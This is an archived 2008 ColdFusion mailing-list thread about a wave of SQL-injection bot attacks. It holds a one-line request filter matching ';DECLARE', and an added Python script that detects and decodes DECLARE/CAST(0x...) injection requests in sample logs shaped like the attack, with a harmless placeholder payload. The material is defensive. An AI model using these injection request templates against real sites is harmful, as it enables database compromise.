> socially-inept basement-dwelling death-penalty-deserving hacker-wannabes.
>
> --- Ben
Now please don't hold back your feelings on our account. Please just
tell us how you really feel!
P.S. As Mark said. This is a cool side of a CF celebrity we just don't
get to see. Cool!
Author: Wil Genovese
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310539
very few bots accept cookies. I've never actually seen one that does,
but I have read it is possible to write one that will.
Wil Genovese
One man with courage makes a majority.
-Andrew Jackson
A fine is a tax for doing wrong. A tax is a fine for doing well.
Author: Ian Skinner
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310540
Ben Forta wrote:
> ... parasitic bottom-feeding bots created by
> despicable scum-sucking feeble-excuse-for-a-carbon-based-life-form repugnant
> socially-inept basement-dwelling death-penalty-deserving hacker-wannabes.
>
> --- Ben
Now please don't hold back your feelings on our account. Please just
tell us how you really feel!
P.S. As Mark said. This is a cool side of a CF celebrity we just don't
get to see. Cool!
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310537
Dang, the brutes thought of everything. I even tried a test to see if the
bots would return cookies I attempted to set in order to track them easier.
Nope, they don't.
~Brad
Author: Alan Rother
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310536
I think a lot of us are doing that now.
Do you think it would be helpful in some way for us to all pool that data?
Create some central repository for it so we can all make use of it and maybe
even get the attention of some of the ISP?
----- Excess quoted text cut - see Original Post for more -----
--
Alan Rother
Adobe Certified Advanced ColdFusion MX 7 Developer
Manager, Phoenix Cold Fusion User Group, AZCFUG.org
Author: Ben Forta
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310535
Yep, was curious about that too. I modified Justin's script to not send
e-mails, but to write a simple log entry - more an act of curiosity than
anything else - I just log the date, time, and client IP address.
--- Ben
Tell us how you really feel Ben. :)
I had to temporarily stop apache on my site long enough to get a stop gap in
place. My database is safe, but I was getting around 90 requests a second
and ColdFusion and MySQL were eating up all the server's CPU trying to keep
up. SSH was even unresponsive.
I think I'm going to dump all these attempts in a database to analyze. I'm
curious where the majority of the IPs are coming from. There has to be a
way to squeak in the ear of ISPs loud enough to have them shut down infected
users until they are cleaned.
~Brad
----- Excess quoted text cut - see Original Post for more -----
Author: Brad Wood
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310533
Tell us how you really feel Ben. :)
I had to temporarily stop apache on my site long enough to get a stop gap in
place. My database is safe, but I was getting around 90 requests a second
and ColdFusion and MySQL were eating up all the server's CPU trying to keep
up. SSH was even unresponsive.
I think I'm going to dump all these attempts in a database to analyze. I'm
curious where the majority of the IPs are coming from. There has to be a
way to squeak in the ear of ISPs loud enough to have them shut down infected
users until they are cleaned.
~Brad
----- Excess quoted text cut - see Original Post for more -----
Author: Mark Kruger
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310532
Ben,
I know I speak for all of us when I say this is a side of you we've never
seen. The jury's out but I think I like it (ha).
-Mark
Yep, I turned e-mail notifications off too, leave it on and you can
inadvertently turn blocking SQL injection attacks into a self-imposed DoS
attack. Fun stuff.
On the plus side, it's nice to see CF finally getting the recognition it
deserves, even if it is from parasitic bottom-feeding bots created by
despicable scum-sucking feeble-excuse-for-a-carbon-based-life-form repugnant
socially-inept basement-dwelling death-penalty-deserving hacker-wannabes.
--- Ben
Which explains why House of Fusion is being so heavily hit. We're literally
everywhere on Google. Fusion Authority on the other hand has all of its urls
masked to .htm so the only one being attacked there is an old .cfm archive.
I'm working on a webserver level fix for this which will bypass the need to
block based on IPs. I just need a few moments. The attacks are hitting VERY
hard. I got 4000 alert emails in the space of 5 minutes before I turned them
off again.
On Fri, Aug 8, 2008 at 11:27 AM, Tom Chiverton <tom.chiverton@halliwells.com
----- Excess quoted text cut - see Original Post for more -----
Author: Greg Morphis
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310530
Preach it Brother Ben!
----- Excess quoted text cut - see Original Post for more -----
Author: Alan Rother
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310531
Geez Ben, tell how you really feel...
=]
----- Excess quoted text cut - see Original Post for more -----
--
Alan Rother
Adobe Certified Advanced ColdFusion MX 7 Developer
Manager, Phoenix Cold Fusion User Group, AZCFUG.org
Author: Ben Forta
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310529
Yep, I turned e-mail notifications off too, leave it on and you can
inadvertently turn blocking SQL injection attacks into a self-imposed DoS
attack. Fun stuff.
On the plus side, it's nice to see CF finally getting the recognition it
deserves, even if it is from parasitic bottom-feeding bots created by
despicable scum-sucking feeble-excuse-for-a-carbon-based-life-form repugnant
socially-inept basement-dwelling death-penalty-deserving hacker-wannabes.
--- Ben
Which explains why House of Fusion is being so heavily hit. We're literally
everywhere on Google. Fusion Authority on the other hand has all of its urls
masked to .htm so the only one being attacked there is an old .cfm archive.
I'm working on a webserver level fix for this which will bypass the need to
block based on IPs. I just need a few moments. The attacks are hitting VERY
hard. I got 4000 alert emails in the space of 5 minutes before I turned them
off again.
On Fri, Aug 8, 2008 at 11:27 AM, Tom Chiverton <tom.chiverton@halliwells.com
----- Excess quoted text cut - see Original Post for more -----
Author: Scott Stewart
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310527
Ouch....
Thanks Tom... :)
--
Scott Stewart
ColdFusion Developer
Office of Research Information Systems
Research & Economic Development
University of North Carolina at Chapel Hill
Phone:(919)843-2408
Fax: (919)962-3600
Email: sastew01@email.unc.edu
Tom Chiverton wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Michael Dinowitz
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310528
Which explains why House of Fusion is being so heavily hit. We're literally
everywhere on Google. Fusion Authority on the other hand has all of its urls
masked to .htm so the only one being attacked there is an old .cfm archive.
I'm working on a webserver level fix for this which will bypass the need to
block based on IPs. I just need a few moments. The attacks are hitting VERY
hard. I got 4000 alert emails in the space of 5 minutes before I turned them
off again.
On Fri, Aug 8, 2008 at 11:27 AM, Tom Chiverton <tom.chiverton@halliwells.com
----- Excess quoted text cut - see Original Post for more -----
Author: Tom Chiverton
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310524
> I'm almost flattered that someone thought my site was important enough
> to attack...
They didn't. The attack is probably driving itself based on a Google search (
[inurl:.cfm] ?) .
--
Tom Chiverton
****************************************************
This email is sent for and on behalf of Halliwells LLP.
Halliwells LLP is a limited liability partnership registered in England and Wales
under registered number OC307980 whose registered office address is at Halliwells
LLP, 3 Hardman Square, Spinningfields, Manchester, M3 3EB. A list of members is
available for inspection at the registered office. Any reference to a partner in
relation to Halliwells LLP means a member of Halliwells LLP. Regulated by The
Solicitors Regulation Authority.
CONFIDENTIALITY
This email is intended only for the use of the addressee named above and may be
confidential or legally privileged. If you are not the addressee you must not
read it and must not use any information contained in nor copy it nor inform any
person other than Halliwells LLP or the addressee of its existence or contents.
If you have received this email in error please delete it and notify Halliwells
LLP IT Department on 0870 365 2500.
For more information about Halliwells LLP visit
www.halliwells.com.
Author: Scott Stewart
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310515
and you're absolutely right, I've gotten two and query params covered it,
but it sounds like you're getting hit two pronged.
"If the injection doesn't do something, the brute force attack will"
I'm almost flattered that someone thought my site was important enough
to attack...
Scott Stewart
ColdFusion Developer
Office of Research Information Systems
Research & Economic Development
University of North Carolina at Chapel Hill
Phone:(919)843-2408
Fax: (919)962-3600
Email: sastew01@email.unc.edu
Michael Dinowitz wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Mike Kear
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310514
In the last 7 hours since I set up a counter on it, I've had 2792 on
sites far lower volume than HouseofFusion.. So do I get a prize?
Cheers
Mike Kear
Windsor, NSW, Australia
Adobe Certified Advanced ColdFusion Developer
AFP Webworks
http://afpwebworks.com
ColdFusion, PHP, ASP, ASP.NET hosting from AUD$15/month
> Yeah, I've gotten a couple today.. but fortunately when Ray built
> BlogCFC. he covered his bases.
>
> Scott Stewart
> ColdFusion Developer
Author: Michael Dinowitz
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310512
Covering the bases with cfqueryparam is one thing, being mobbed is another.
Sometimes you have to stop these things before any other code is run. I've
put that abort script at the top of all my application.cfcs just to brute
force stop the horde.
On Fri, Aug 8, 2008 at 10:31 AM, Scott Stewart
<sastew01@email.unc.edu>wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Scott Stewart
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310511
Yeah, I've gotten a couple today.. but fortunately when Ray built
BlogCFC. he covered his bases.
Scott Stewart
ColdFusion Developer
Office of Research Information Systems
Research & Economic Development
University of North Carolina at Chapel Hill
Phone:(919)843-2408
Fax: (919)962-3600
Email: sastew01@email.unc.edu
Michael Dinowitz wrote:
----- Excess quoted text cut - see Original Post for more -----
Author: Michael Dinowitz
Short Link: http://www.houseoffusion.com/groups/cf-talk/thread.cfm/threadid:57241#310505
Sorry for the problems with the House of Fusion site. We've been under
massive attack by sql injection bots and I've just been able to get a handle
on it. A fast solution to the problem is this:
<cfif findnocase("';DECLARE", cgi.query_string)><cfabort></cfif>
It works unless you have a few hundred attacks at a time. In that case,
place a cfmail before the abort and send yourself the cgi.remote_addr. Then
block it on the webserver level. It works very well. I've blocked a dozen
IPs and now the site is back to flying.
--
Michael Dinowitz (http://www.linkedin.com/in/mdinowitz)
President: House of Fusion (http://www.houseoffusion.com)
Publisher: Fusion Authority (http://www.fusionauthority.com)
Adobe Community Expert / Advanced Certified ColdFusion Professional
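As an added example (not code from any poster in this thread), a Python triage script that applies the same case-insensitive ';DECLARE / EXEC( / CAST(' test that Michael's cfif filter and Eric's page-top filter use, decodes the CAST(0x...) hex blob the way Terry describes to recover the script URL it references, and tallies flagged requests per client IP as Brad and the first poster did. The log lines and hex blob are constructed; the decoded text is a harmless placeholder and example.invalid is an assumed domain.

```python
"""Triage Apache access-log lines for the ';DECLARE ... CAST(0x...)' injection requests
discussed in this thread. Added example, not code from the thread: the log lines and
the hex blob are constructed, and the decoded payload is a harmless placeholder."""
import re
from collections import Counter
from urllib.parse import unquote_plus

# Apache combined log: ip ident user [ts] "METHOD path PROTO" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# T-SQL fragments the posters filter on (Michael: ';DECLARE; Eric: DECLARE, EXEC(, CAST( ).
TSQL_MARKERS = ("DECLARE", "EXEC(", "CAST(")
# The hex blob sits inside CAST(0x... AS CHAR/NVARCHAR(n)).
HEX_RE = re.compile(r"CAST\(0x([0-9A-Fa-f]+)\s+AS", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"<>]+")


def query_of(path: str) -> str:
    """URL-decoded query string of a request path ('' when there is none)."""
    return unquote_plus(path.partition("?")[2])


def is_injection_request(path: str) -> bool:
    """Case-insensitive marker match, like findnocase() on cgi.query_string."""
    query = query_of(path).upper()
    return any(marker in query for marker in TSQL_MARKERS)


def decode_hex_payload(path: str) -> str:
    """Recover the text hidden in CAST(0x... AS ...), or '' when absent.

    CHAR payloads are one byte per character; NVARCHAR payloads are UTF-16LE,
    recognisable by a 0x00 in every odd position. A blob cut short by a log
    line limit (odd number of hex digits) loses its dangling nibble."""
    match = HEX_RE.search(query_of(path))
    if not match:
        return ""
    digits = match.group(1)
    if len(digits) % 2:
        digits = digits[:-1]
    raw = bytes.fromhex(digits)
    if len(raw) >= 2 and all(b == 0 for b in raw[1::2]):
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")


def triage(log_lines):
    """Return (Counter of flagged requests per client IP, set of URLs found in decoded payloads)."""
    hits = Counter()
    urls = set()
    for line in log_lines:
        match = LOG_RE.match(line)
        if not match or not is_injection_request(match.group("path")):
            continue
        hits[match.group("ip")] += 1
        urls.update(URL_RE.findall(decode_hex_payload(match.group("path"))))
    return hits, urls


def low_volume_ips(hits: Counter, threshold: int = 5) -> int:
    """Number of attacking IPs that sent fewer than `threshold` requests: the metric behind
    the thread's observation that per-IP blocking does not pay off against this botnet."""
    return sum(1 for n in hits.values() if n < threshold)


# Constructed sample data: the placeholder stands in for the real payload, and
# example.invalid is an assumed domain.
PLACEHOLDER = "-- constructed placeholder that references http://example.invalid/w.js"
CHAR_HEX = PLACEHOLDER.encode("ascii").hex().upper()
NCHAR_HEX = PLACEHOLDER.encode("utf-16-le").hex().upper()
SAMPLE_LOG = [
    # CHAR(4000) variant in the shape Brad quoted, percent-encoded as Apache logs it
    f'203.0.113.10 - - [08/Aug/2008:11:27:03 -0500] "GET /index.cfm?;DECLARE%20@S%20CHAR(4000);'
    f'SET%20@S=CAST(0x{CHAR_HEX}%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    # NVARCHAR variant appended to a real parameter
    f'203.0.113.10 - - [08/Aug/2008:11:27:04 -0500] "GET /product.cfm?id=12;DECLARE%20@S%20NVARCHAR(4000);'
    f'SET%20@S=CAST(0x{NCHAR_HEX}%20AS%20NVARCHAR(4000));EXEC(@S); HTTP/1.1" 500 0 "-" "Mozilla/4.0"',
    # Lower-case variant without a hex blob: still flagged, nothing to decode
    '198.51.100.7 - - [08/Aug/2008:11:29:41 -0500] "GET /index.cfm?id=7;declare%20@s%20char(10) HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    # Apostrophe probing as Eric described: not matched by this filter
    '198.51.100.7 - - [08/Aug/2008:11:29:42 -0500] "GET /product.cfm?id=12%27 HTTP/1.1" 500 0 "-" "Mozilla/4.0"',
    # Ordinary traffic
    '192.0.2.44 - - [08/Aug/2008:11:30:00 -0500] "GET /product.cfm?id=12 HTTP/1.1" 200 1024 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    hits, urls = triage(SAMPLE_LOG)
    for ip, n in hits.most_common():
        print(f"{ip:16} {n}")
    print("referenced URLs:", sorted(urls))
    print("IPs with fewer than 5 hits:", low_volume_ips(hits))
```

Feed it real access-log lines instead of SAMPLE_LOG; the apostrophe-probing line shows what this marker-based filter deliberately does not catch.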
May 24, 2012